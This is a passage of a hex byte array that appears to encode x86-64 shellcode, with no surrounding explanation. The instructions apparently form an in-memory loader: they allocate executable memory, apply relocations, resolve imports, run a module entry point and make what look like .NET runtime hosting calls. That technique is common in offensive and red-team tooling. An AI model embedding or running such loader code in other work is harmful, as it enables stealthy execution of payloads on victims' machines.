560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
567 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48,
568 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48,
569 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48,
570 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85,
571 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00,
572 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
573 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02,
574 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
575 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83,
576 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00,
577 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38,
578 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b,
579 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b,
580 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89,
581 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
582 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
583 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
584 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
585 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00,
586 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01,
587 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00,
588 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00,
589 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64,
590 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48,
591 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff,
592 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
593 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00,
594 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
595 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1,
596 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b,
597 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48,
598 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f,
599 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02,
600 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b,
601 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b,
602 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30,
603 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
604 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
605 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85,
606 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b,
607 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b,
608 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00,
609 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
610 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85,
611 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f,
612 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48,
613 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
614 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b,
615 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01,
616 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85,
617 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85,
618 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
619 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20,
620 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
621 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00,
622 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01,
623 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00,
624 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
625 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00,
626 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
627 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48,
628 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00,
629 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff,
630 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83,
631 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80,
632 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
633 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
634 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
635 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10,
636 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01,
637 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff,
638 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07,
639 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
640 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
641 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
642 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f,
643 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45,
644 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1,
645 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d,
646 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00,
647 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d,
648 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44,
649 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00,
650 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11,
651 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b,
652 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
653 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85,
654 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85,
655 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x68, 0x48,
656 0x8b, 0x8d, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x68, 0x41, 0xb8,
657 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb,
658 0x26, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89,
659 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
660 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0xff, 0xd0, 0xeb, 0x04, 0x90,
661 0xeb, 0x01, 0x90, 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x74,
662 0x25, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50,
663 0x48, 0x8b, 0x8d, 0x08, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00,
664 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x04, 0x90, 0xeb,
665 0x01, 0x90, 0x48, 0x81, 0xc4, 0xd0, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55,
666 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48, 0x89, 0x4d, 0x10, 0x48,
667 0x8b, 0x45, 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
668 0x75, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
669 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
670 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
671 0x10, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x92,
672 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01, 0x48, 0x01, 0xd2, 0x41,
673 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9,
674 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x83,
675 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x9b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
676 0x10, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x92,
677 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x55,
678 0xf8, 0x48, 0x8d, 0x8a, 0x18, 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
679 0x28, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
680 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
681 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
682 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
683 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec,
684 0x00, 0x0f, 0x85, 0xf1, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48,
685 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d,
686 0x82, 0xec, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8d, 0x8a,
687 0xdc, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89, 0x54, 0x24,
688 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
689 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00,
690 0x0f, 0x85, 0x9d, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b,
691 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0,
692 0x4c, 0x8d, 0x45, 0xd6, 0x48, 0x8b, 0x55, 0xf0, 0xff, 0xd0, 0x89, 0x45,
693 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x64, 0x0f, 0xb7, 0x45, 0xd6, 0x66,
694 0x85, 0xc0, 0x74, 0x5b, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48,
695 0x8b, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xfc, 0x04, 0x00,
696 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xd8, 0xff, 0xd0, 0x89,
697 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x33, 0x48, 0x8b, 0x45, 0xe0,
698 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b,
699 0x55, 0xd8, 0x48, 0x8b, 0x4d, 0xe0, 0x4c, 0x8d, 0x45, 0xc8, 0xff, 0xd0,
700 0x89, 0x45, 0xec, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x00, 0x48, 0x8b,
701 0x40, 0x10, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
702 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
703 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48,
704 0x8b, 0x80, 0x30, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10,
705 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48,
706 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0xba, 0x00,
707 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x69, 0x18, 0x00, 0x00, 0x48,
708 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x4d, 0xf0, 0x41,
709 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
710 0x90, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30,
711 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
712 0x89, 0x8d, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00,
713 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
714 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
715 0x00, 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
716 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
717 0x48, 0x89, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
718 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
719 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x01,
720 0x48, 0x01, 0xd2, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00,
721 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
722 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xa0, 0x01, 0x00, 0x00,
723 0x00, 0x0f, 0x84, 0x78, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
724 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00,
725 0x00, 0x48, 0x8b, 0x92, 0x10, 0x19, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89,
726 0xd0, 0x48, 0x8b, 0x95, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
727 0x19, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x95, 0xa0,
728 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff,
729 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00,
730 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00, 0x00,
731 0x48, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01,
732 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00, 0x00,
733 0xe8, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0x85,
734 0x38, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x20, 0x01, 0x00, 0x00, 0x48,
735 0x83, 0xc0, 0x18, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x01, 0x00,
736 0x00, 0xe8, 0xc8, 0x06, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x30, 0x01, 0x00,
737 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00,
738 0x48, 0x8b, 0x80, 0x20, 0x01, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
739 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00,
740 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x59, 0x02,
741 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
742 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x4c,
743 0x8d, 0x82, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xc0, 0x01, 0x00,
744 0x00, 0x48, 0x8d, 0x8a, 0x7c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x80,
745 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41,
746 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
747 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00,
748 0x00, 0x0f, 0x85, 0x00, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
749 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x95, 0xc0,
750 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x04, 0x00, 0x00, 0x48, 0x8b,
751 0x8d, 0x80, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x88, 0x01, 0x00, 0x00,
752 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
753 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
754 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48,
755 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89,
756 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00,
757 0x0f, 0x85, 0x47, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
758 0x00, 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
759 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b,
760 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x20, 0x01, 0x00, 0x00,
761 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01,
762 0x00, 0x00, 0x00, 0x0f, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
763 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48,
764 0x8b, 0x95, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0xcc, 0x03, 0x00,
765 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x01, 0x00,
766 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
767 0x8b, 0x40, 0x40, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b,
768 0x95, 0x90, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x02, 0x00, 0x00, 0x00, 0xff,
769 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x01,
770 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
771 0x90, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0xbd, 0x9c,
772 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x8f, 0x00, 0x00, 0x00, 0x48, 0x8b,
773 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x28,
774 0x48, 0x8b, 0x8d, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01,
775 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48,
776 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
